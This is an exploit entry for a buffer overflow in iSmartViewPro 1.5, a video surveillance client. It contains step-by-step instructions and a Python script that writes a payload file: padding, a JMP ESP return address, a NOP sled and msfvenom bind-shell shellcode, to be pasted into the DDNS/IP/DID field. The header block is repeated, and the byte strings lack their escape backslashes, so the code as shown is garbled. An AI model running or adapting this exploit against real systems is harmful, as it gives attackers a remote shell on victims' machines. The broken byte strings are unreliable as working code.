iSmartViewPro 1.5 DDNS Buffer Overflow

# Exploit Title: iSmartViewPro 1.5 - 'DDNS/IP/DID' Buffer Overflow
# Discovery by: Luis Martinez
# Discovery Date: 2018-09-03
# Vendor Homepage: https://securimport.com/
# # Exploit Title: iSmartViewPro 1.5 - 'DDNS/IP/DID' Buffer Overflow
# Discovery by: Luis Martinez
# Discovery Date: 2018-09-03
# Vendor Homepage: https://securimport.com/
# Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5
# Tested Version: 1.5
# Vulnerability Type: Buffer Overflow
# Tested on OS: Windows XP Professional SP3 x86 es

# Steps to Produce the Buffer Overflow:
# 1.- Run python code : iSmartViewPro_1.5.py
# 2.- Open iSmartViewPro_1.5.txt and copy content to clipboard
# 3.- Open iSmartViewPro
# 4.- Add Device
# 5.- Add device manually
# 6.- Device alias -> test
# 7.- Paste ClipBoard on "DDNS/IP/DID"
# 8.- Account -> admin
# 9.- Password -> admin
# 10.- Save

#!/usr/bin/env python

#7E6B30D7 FFE4 JMP ESP SHELL32.dll
ret = "xD7x30x6Bx7E"

#msfvenom -p windows/shell_bind_tcp -b 'x00x0Ax0D' -f c
shellcode = (
"xbbx3cxd8x80xccxdaxc3xd9x74x24xf4x5ax31xc9xb1"
"x53x31x5ax12x03x5ax12x83xd6x24x62x39xdax3dxe1"
"xc2x22xbex86x4bxc7x8fx86x28x8cxa0x36x3axc0x4c"
"xbcx6exf0xc7xb0xa6xf7x60x7ex91x36x70xd3xe1x59"
"xf2x2ex36xb9xcbxe0x4bxb8x0cx1cxa1xe8xc5x6ax14"
"x1cx61x26xa5x97x39xa6xadx44x89xc9x9cxdbx81x93"
"x3exdax46xa8x76xc4x8bx95xc1x7fx7fx61xd0xa9xb1"
"x8ax7fx94x7dx79x81xd1xbax62xf4x2bxb9x1fx0fxe8"
"xc3xfbx9axeax64x8fx3dxd6x95x5cxdbx9dx9ax29xaf"
"xf9xbexacx7cx72xbax25x83x54x4ax7dxa0x70x16x25"
"xc9x21xf2x88xf6x31x5dx74x53x3ax70x61xeex61x1d"
"x46xc3x99xddxc0x54xeaxefx4fxcfx64x5cx07xc9x73"
"xa3x32xadxebx5axbdxcex22x99xe9x9ex5cx08x92x74"
"x9cxb5x47xe0x94x10x38x17x59xe2xe8x97xf1x8bxe2"
"x17x2exabx0cxf2x47x44xf1xfdx76xc9x7cx1bx12xe1"
"x28xb3x8axc3x0ex0cx2dx3bx65x24xd9x74x6fxf3xe6"
"x84xa5x53x70x0fxaax67x61x10xe7xcfxf6x87x7dx9e"
"xb5x36x81x8bx2dxdax10x50xadx95x08xcfxfaxf2xff"
"x06x6exefxa6xb0x8cxf2x3fxfax14x29xfcx05x95xbc"
"xb8x21x85x78x40x6exf1xd4x17x38xafx92xc1x8ax19"
"x4dxbdx44xcdx08x8dx56x8bx14xd8x20x73xa4xb5x74"
"x8cx09x52x71xf5x77xc2x7ex2cx3cxf2x34x6cx15x9b"
"x90xe5x27xc6x22xd0x64xffxa0xd0x14x04xb8x91x11"
"x40x7ex4ax68xd9xebx6cxdfxdax39")

buffer = "x41" * 383 + ret + "x90" * 8 + shellcode
f = open ("iSmartViewPro_1.5.txt", "w")
f.write(buffer)
f.close()